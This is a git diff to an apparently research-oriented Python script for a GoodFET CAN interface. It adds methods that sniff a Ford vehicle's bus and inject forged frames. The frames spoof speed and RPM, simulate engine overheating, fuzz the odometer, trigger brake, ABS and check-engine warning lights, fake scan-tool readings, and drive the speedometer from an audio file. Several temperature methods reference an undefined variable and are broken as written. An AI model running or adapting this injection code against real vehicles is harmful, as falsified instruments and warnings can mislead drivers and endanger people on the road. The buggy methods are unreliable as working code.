X-Git-Url: http://git.rot13.org/?p=goodfet;a=blobdiff_plain;f=client%2FFordExperiments.py;h=4461acd7257ab15a53930ff6ff225eaa5cf1e528;hp=0e09b4b49a17b7c915a9abd4f9ff198b26a04f5b;hb=HEAD;hpb=617868f9572f44267cc31681f90833c18af2fd6a diff --git a/client/FordExperiments.py b/client/FordExperiments.py index 0e09b4b..4461acd 100644 --- a/client/FordExperiments.py +++ b/client/FordExperiments.py @@ -4,6 +4,7 @@ import array; import csv, time, argparse; import datetime import os +import random from random import randrange from GoodFETMCPCAN import GoodFETMCPCAN; from experiments import experiments @@ -11,6 +12,7 @@ from GoodFETMCPCANCommunication import GoodFETMCPCANCommunication from intelhex import IntelHex; import Queue import math +import wave tT = time class FordExperiments(experiments): @@ -135,15 +137,27 @@ class FordExperiments(experiments): print packetCount; def getBackground(self,sId): + """ + This method gets the background packets for the given id. This + is a simple "background" retriever in that it returns the packet + that is of the given id that was sniffed off the bus. + """ + self.client.serInit() + self.spitSetup(500) + self.addFilter([sId,sId,sId,sId,sId,sId]) packet1 = self.client.rxpacket(); if(packet1 != None): packetParsed = self.client.packet2parsed(packet1); #keep sniffing till we read a packet - while( packet1 == None or packetParsed.get('sID') != sId ): + startTime = time.time() + while( (packet1 == None or packetParsed.get('sID') != sId) and (time.time() - startTime) < 5): packet1 = self.client.rxpacket() + print packet1 if(packet1 != None): packetParsed = self.client.packet2parsed(packet1) - + if( packet1 == None or packetParsed.get('sID') != sId): + print "exiting without packet" + #print "returning", packetParsed #recieveTime = time.time() return packetParsed @@ -166,8 +180,50 @@ class FordExperiments(experiments): # print the packet we are transmitting print packetParsed + def oscillateMPH(self,runTime): + self.client.serInit() + self.spitSetup(500) + #FIGURE out how to clear buffers + self.addFilter([513, 513, 513, 513,513, 513], verbose=False) + packetParsed = self.getBackground(513) + packet = [] + #set data packet to match what was sniffed or at least what was input + for i in range(0,8): + idx = "db%d"%i + packet.append(packetParsed.get(idx)) + packetValue = 0 + packet[1] = packetValue; - def oscillateTemperature(self,time): + print packet + #### split SID into different regs + SIDlow = (513 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5 + SIDhigh = (513 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0 + packet = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs + 0x08, # bit 6 must be set to 0 for data frame (1 for RTR) + # lower nibble is DLC + packet[0],packet[1],packet[2],packet[3],packet[4],packet[5],packet[6],packet[7]] + packetCount = 1; + self.client.txpacket(packet); + startTime = tT.time() + while( (tT.time()-startTime) < runTime): + dt = tT.time()-startTime + inputValue = ((2.0*math.pi)/20.0)*dt + value = 35*math.sin(inputValue)+70 + print value + #if( value%4 == 0): + # packet[5] = 95 + #else: + # packet[5] = 0 + #packet[9] = int(value) + packet[5] = int(value) + print packet + self.client.txpacket(packet) + packetCount += 1 + def oscillateTemperature(self,runTime): + """ + + + """ #setup chip self.client.serInit() self.spitSetup(500) @@ -178,7 +234,7 @@ class FordExperiments(experiments): #set data packet to match what was sniffed or at least what was input for i in range(0,8): idx = "db%d"%i - packet.append(ord(packetParsed.get(idx))) + packet.append(packetParsed.get(idx)) packetValue = 0 packet[1] = packetValue; @@ -263,6 +319,338 @@ class FordExperiments(experiments): #send packets self.multpackSpit(packet0rts=True,packet1rts=True,packet2rts=True) + def setScanToolTemp(self,temp): + self.client.serInit() + self.spitSetup(500) + + self.addFilter([2024, 2024, 2024]) + self.client.rxpacket() + self.client.rxpacket() + self.client.rxpacket() + SIDlow = (2024 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5 + SIDhigh = (2024 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0 + + startTime = time.time() + #while((time.time() - startTime) < 10): + + packet = None; + + # catch a packet and check its db4 value + while (packet == None): + packet=self.client.rxpacket(); + + + newTemp = math.ceil(level/1.8 + 22) + #print "Fake MPH = 1.617(%d)-63.5 = %d" %(newSpeed, mph) + + + newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs + 0x08, # bit 6 must be set to 0 for data frame (1 for RTR) + # lower nibble is DLC + ord(packet[5]),ord(packet[6]),ord(packet[7]),newTemp,ord(packet[9]),ord(packet[10]),ord(packet[11]),ord(packet[12])] + + # load new packet into TXB0 and check time + self.multiPacketSpit(packet0=newPacket, packet0rts=True) + starttime = time.time() + + # spit new value for 1 second + while (time.time()-starttime < 10): + self.multiPacketSpit(packet0rts=True) + + def setEngineTemp(self,temp): + self.client.serInit() + self.spitSetup(500) + + self.addFilter([1056, 1056, 1056,1056,1056,1056]) + self.client.rxpacket() + self.client.rxpacket() + self.client.rxpacket() + SIDlow = (1056 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5 + SIDhigh = (1056 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0 + + startTime = time.time() + #while((time.time() - startTime) < 10): + + packet = None; + + # catch a packet and check its db4 value + while (packet == None): + packet=self.client.rxpacket(); + + + newTemp = int(math.ceil(level/1.8 + 22)) + #print "Fake MPH = 1.617(%d)-63.5 = %d" %(newSpeed, mph) + + + newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs + 0x08, # bit 6 must be set to 0 for data frame (1 for RTR) + # lower nibble is DLC + newTemp,ord(packet[6]),ord(packet[7]),ord(packet[8]),ord(packet[9]),ord(packet[10]),ord(packet[11]),ord(packet[12])] + + # load new packet into TXB0 and check time + self.multiPacketSpit(packet0=newPacket, packet0rts=True) + starttime = time.time() + + # spit new value for 1 second + while (time.time()-starttime < 10): + self.multiPacketSpit(packet0rts=True) + + def overHeatEngine(self): + self.client.serInit() + self.spitSetup(500) + + self.addFilter([1056, 1056, 1056]) + packet = self.getBackground(1056) + SIDlow = (1056 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5 + SIDhigh = (1056 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0 + + newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs + 0x08, # bit 6 must be set to 0 for data frame (1 for RTR) + # lower nibble is DLC + 0xfa,packet['db1'],packet['db2'],packet['db3'],packet['db4'],packet['db5'],packet['db6'],packet['db7']] + startTime = time.time() + self.multiPacketSpit(packet0=newPacket, packet0rts=True) + while( time.time()- startTime < 10): + self.multiPacketSpit(packet0rts=True) + + def runOdometer(self): + self.client.serInit() + self.spitSetup(500) + + self.addFilter([1056, 1056, 1056]) + packet = self.getBackground(1056) + SIDlow = (1056 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5 + SIDhigh = (1056 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0 + odomFuzz = random.randint(1,254) + print packet + newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs + 0x08, # bit 6 must be set to 0 for data frame (1 for RTR) + # lower nibble is DLC + packet['db0'],packet['db1'],packet['db2'],packet['db3'],packet['db4'],packet['db5'],packet['db6'],packet['db7']] + + startTime = time.time() + packet[6] = odomFuzz; + while( time.time()- startTime < 10): + odomFuzz = random.randint(1,254) + newPacket[6] = odomFuzz + self.client.txpacket(newPacket) + + def setDashboardTemp(self, temp): + self.client.serInit() + self.spitSetup(500) + + self.addFilter([1056, 1056, 1056]) + self.client.rxpacket() + self.client.rxpacket() + self.client.rxpacket() + SIDlow = (1056 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5 + SIDhigh = (1056 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0 + + startTime = time.time() + #while((time.time() - startTime) < 10): + + packet = None; + + # catch a packet and check its db4 value + while (packet == None): + packet=self.client.rxpacket(); + + + newTemp = math.ceil(level/1.8 + 22) + #print "Fake MPH = 1.617(%d)-63.5 = %d" %(newSpeed, mph) + + + newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs + 0x08, # bit 6 must be set to 0 for data frame (1 for RTR) + # lower nibble is DLC + newTemp,ord(packet[6]),ord(packet[7]),ord(packet[8]),ord(packet[9]),ord(packet[10]),ord(packet[11]),ord(packet[12])] + + # load new packet into TXB0 and check time + self.multiPacketSpit(packet0=newPacket, packet0rts=True) + starttime = time.time() + + # spit new value for 1 second + while (time.time()-starttime < 10): + self.multiPacketSpit(packet0rts=True) + + + def warningLightsOn(self,checkEngine, checkTransmission, transmissionOverheated, engineLight, battery, fuelCap, checkBreakSystem,ABSLight, dashB): + + if( checkBreakSystem == 1 or ABSLight == 1): + SIDlow = (530 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5 + SIDhigh = (530 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0 + print "looking for 530" + packet = self.getBackground(530) + print "found" + packet2 = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs + 0x08, # bit 6 must be set to 0 for data frame (1 for RTR) + # lower nibble is DLC + packet['db0'],packet['db1'],packet['db2'],packet['db3'],packet['db4'],packet['db5'],packet['db6'],packet['db7']] + if( checkBreakSystem == 1 and ABSLight == 1): + packet2[9] = 97 + elif( checkBreakSystem == 0 and ABSLight == 1): + packet2[9] = 16 + elif(checkBreakSystem==1 and ABSLight == 0): + packet2[9] = 64 + packet2rts = True + else: + packet2rts = False + packet2 = None + print packet2 + SIDlow = (1056 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5 + SIDhigh = (1056 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0 + print "looking for 1056" + packet = self.getBackground(1056) + print "found" + packet1 = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs + 0x08, # bit 6 must be set to 0 for data frame (1 for RTR) + # lower nibble is DLC + packet['db0'],packet['db1'],packet['db2'],packet['db3'],packet['db4'],packet['db5'],packet['db6'],packet['db7']] + if( checkEngine == 1): + packet1[9] += 2; + print packet1 + if( checkTransmission == 1): + packet1[9] += 3; + print packet1 + if( transmissionOverheated == 1): + packet1[9] += 4 + print packet1 + if( engineLight == 1): + packet1[9] += 64 + print packet1 + if( fuelCap == 1): + packet1[10] = 255 + print packet1 + if( battery == 1): + packet1[7] = 33 + print packet1 + if( dashB == 1): + packet1[6] = 255 + print "hello" + self.client.serInit() + self.spitSetup(500) + # load new packet into TXB0 and check time + self.multiPacketSpit(packet0=packet1,packet1=packet2, packet0rts=True,packet1rts=packet2rts ) + starttime = time.time() + print "starting" + # spit new value for 1 second + while ((time.time()-starttime) < 10): + self.multiPacketSpit(packet0rts=True,packet1rts = packet2rts) + + def fakeScanToolFuelLevel(self,level): + self.client.serInit() + self.spitSetup(500) + + self.addFilter([2024, 2024, 2024]) + self.client.rxpacket() + self.client.rxpacket() + self.client.rxpacket() + SIDlow = (2024 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5 + SIDhigh = (2024 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0 + + startTime = time.time() + #while((time.time() - startTime) < 10): + + packet = None; + + # catch a packet and check its db4 value + while (packet == None): + packet=self.client.rxpacket(); + + level = int(level/.4) + #print "Fake MPH = 1.617(%d)-63.5 = %d" %(newSpeed, mph) + + + newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs + 0x08, # bit 6 must be set to 0 for data frame (1 for RTR) + # lower nibble is DLC + 3,65,47,level,ord(packet[9]),ord(packet[10]),ord(packet[11]),ord(packet[12])] + + # load new packet into TXB0 and check time + self.multiPacketSpit(packet0=newPacket, packet0rts=True) + starttime = time.time() + + # spit new value for 1 second + while (time.time()-starttime < 10): + self.multiPacketSpit(packet0rts=True) + + def fakeOutsideTemp(self,level): + self.client.serInit() + self.spitSetup(500) + + self.addFilter([2024, 2024, 2024,2024,2024,2024]) + self.client.rxpacket() + self.client.rxpacket() + self.client.rxpacket() + SIDlow = (2024 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5 + SIDhigh = (2024 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0 + + startTime = time.time() + #while((time.time() - startTime) < 10): + + packet = None; + + # catch a packet and check its db4 value + while (packet == None): + packet=self.client.rxpacket(); + + newTemp = int(math.ceil(level/1.8 + 22)) + #print "Fake MPH = 1.617(%d)-63.5 = %d" %(newSpeed, mph) + print newTemp + + newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs + 0x08, # bit 6 must be set to 0 for data frame (1 for RTR) + # lower nibble is DLC + 03,65,70,newTemp,0,0,0,0] + + # load new packet into TXB0 and check time + self.multiPacketSpit(packet0=newPacket, packet0rts=True) + starttime = time.time() + print newPacket + # spit new value for 1 second + while (time.time()-starttime < 10): + self.multiPacketSpit(packet0rts=True) + + + def fakeAbsTps(self,level): + self.client.serInit() + self.spitSetup(500) + + self.addFilter([2024, 2024, 2024]) + self.client.rxpacket() + self.client.rxpacket() + self.client.rxpacket() + SIDlow = (2024 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5 + SIDhigh = (2024 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0 + + startTime = time.time() + #while((time.time() - startTime) < 10): + + packet = None; + + # catch a packet and check its db4 value + while (packet == None): + packet=self.client.rxpacket(); + + abstps = int(math.ceil(level/.39)) + + + + newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs + 0x08, # bit 6 must be set to 0 for data frame (1 for RTR) + # lower nibble is DLC + ord(packet[5]),ord(packet[6]),ord(packet[7]),abstps,ord(packet[9]),ord(packet[10]),ord(packet[11]),ord(packet[12])] + + # load new packet into TXB0 and check time + self.multiPacketSpit(packet0=newPacket, packet0rts=True) + starttime = time.time() + + # spit new value for 1 second + while (time.time()-starttime < 10): + self.multiPacketSpit(packet0rts=True) + + + def mphToByteValue(self, mph): return ( mph + 63.5 ) / 1.617 @@ -279,7 +667,11 @@ class FordExperiments(experiments): self.client.rxpacket() SIDlow = (513 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5 SIDhigh = (513 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0 - + + SID2 = (1056 & 0x07) << 5; + SID2high = (1056 >>3) & 0xFF; + packet_odometer = [SID2high, SID2, 0 ,0,8, 65, 0, 32, 120, 0, 0, 1, 247] + startTime = time.time() #while((time.time() - startTime) < 10): @@ -312,8 +704,10 @@ class FordExperiments(experiments): # spit new value for 1 second while (time.time()-starttime < 10): - self.multiPacketSpit(packet0rts=True) - + #self.multiPacketSpit(packet0rts=True) + odomFuzz = random.randint(1,254) + packet_odometer[6] = odomFuzz + self.multiPacketSpit(packet0=newPacket, packet1 =packet_odometer,packet0rts = True, packet1rts=True) def speedometerHack(self, inputs): @@ -356,11 +750,12 @@ class FordExperiments(experiments): # spit new value for 1 second while (time.time()-starttime < 1): + self.multiPacketSpit(packet0rts=True) def rpmToByteValue(self, rpm): value = ( rpm + 61.88 ) / 64.5 - return value + return int(value) def ValueTorpm(self, value): rpm = 64.5*value - 61.88 @@ -446,6 +841,7 @@ class FordExperiments(experiments): # calculate our new mph and db4 value rpm = rpm + inputs[0]; newRPM = ( rpm + 61.88 ) / 64.5 + newRPM = int(newRPM) print "Fake RPM = 64.5(%d)-61.88 = %d" %(newRPM, rpm) @@ -462,9 +858,117 @@ class FordExperiments(experiments): while (time.time()-starttime < 1): self.multiPacketSpit(packet0rts=True) + def imbeethovenbitch(self): + + + ### USUAL SETUP STUFF ###### + self.client.serInit() + self.spitSetup(500) + self.addFilter([513, 513, 513,513]) + SIDlow = (513 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5 + SIDhigh = (513 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0 + + #clear buffers + self.client.rxpacket() + self.client.rxpacket() + self.client.rxpacket() + + + packet = None; + + #catch a packet to mutate + while (packet == None): + packet=self.client.rxpacket(); + newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs + 0x08, # bit 6 must be set to 0 for data frame (1 for RTR) + # lower nibble is DLC + ord(packet[5]),ord(packet[6]),ord(packet[7]),ord(packet[8]),ord(packet[9]),ord(packet[10]),ord(packet[11]),ord(packet[12])] + + + # NOW THE FUN STUFF!!!!! + + music = wave.open("../../contrib/ted/beethovensfifth.wav", 'r'); + print "number of frames: %d " %music.getnframes() + print "number of channels: %d " %music.getnchannels() + print "sample width: %d " %music.getsampwidth() + print "framerate: %d " %music.getframerate() + print "compression: %s " %music.getcompname() + + + numFramesToRead = music.getframerate()*.05 # grab .1s of audio + sampNum = 0 + avgprev = 0 + avg = 0 + while(1): + avgprev = avg + runningSum = 0 + + sample = music.readframes(int(numFramesToRead)) # grab .1s of audio + + length = len(sample) + + for i in range(0, length,4): + runningSum += ord(sample[i]) #average the dual-channel + runningSum += ord(sample[i+2]) + + avg = math.fabs(runningSum/(length /2) -127) # we used 2 of every 4 frames, so divide length by 2 + if( sampNum > 0): + avg = (avg+avgprev)/2 + sampNum = 1 - def runOdometer(self): - pass + val = int(avg*15 + 40) # normalize to speedometer range of values + + print "speedometerVal = %f " %val; + print "speed = %f" %(1.617*val-63.5) # speed we're trying to display + + if (val > 255): # ensure we don't run off acceptable range + val = 255 + elif (val < 0): + val = 0 + + newPacket[9] = int(val) # write it to the packet + + # load new packet into TXB0 and check time + self.multiPacketSpit(packet0=newPacket, packet0rts=True) + starttime = time.time() + + # spit new value for 1 second + while (time.time()-starttime < .1): + self.multiPacketSpit(packet0rts=True) + +# read in 26 frames +# average them +# normalize to our range of values (conversion 1.6167*x-63.5 +# x --> 0 to 120 + +#sample width = 2?? +#number of frames: 7133184 +#number of channels: 2 +#sample width: 2 --> 2 bytes per sample +#framerate: 44100 + + def engineDiagnostic(self, data): + self.client.serInit() + self.spitSetup(500) + self.addFilter([513, 513, 513,513,513,513]) + + startTime = tT.time() + while((tT.time() - startTime ) < 15): + packet = None; + + #catch a packet to decode + while (packet == None): + packet=self.client.rxpacket(); + + rpm = 64.5 * ord(packet[5]) - 61.88 + mph = 1.617 * ord(packet[9]) - 63.5 + print "putting data in" + data.put("Engine RPM: %d Current Speed: %d mph\n"%(rpm, mph)) + time.sleep(.5) + + + + if __name__ == "__main__": @@ -476,7 +980,7 @@ if __name__ == "__main__": fakeVIN rpmHack ''') - parser.add_argument('verb', choices=['speedometerHack', 'rpmHack']); + parser.add_argument('verb', choices=['speedometerHack', 'rpmHack', 'thefifth']); parser.add_argument('-v', '--variable', type=int, action='append', help='Input values to the method of choice', default=None); @@ -490,5 +994,7 @@ if __name__ == "__main__": fe.rpmHack(inputs=inputs) elif( args.verb == 'fakeVIN'): fe.fakeVIN() + elif( args.verb == 'thefifth'): + fe.imbeethovenbitch()